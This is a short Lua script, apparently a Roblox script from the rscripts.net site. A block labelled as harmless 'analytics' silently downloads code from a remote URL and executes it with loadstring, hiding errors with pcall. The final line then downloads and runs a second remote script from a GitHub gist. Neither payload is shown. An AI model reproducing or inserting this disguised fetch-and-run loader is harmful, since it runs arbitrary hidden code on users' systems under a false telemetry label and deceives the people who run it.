--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/v2/client.lua?s=6aad16054a55abbff740d729"))() end) end) --[[rscripts:analytics:end]] loadstring(game:HttpGet("https://gist.githubusercontent.com/raw/4af1b824a661635d4ce98edab69c1b27/l_d3112f.lua", true))()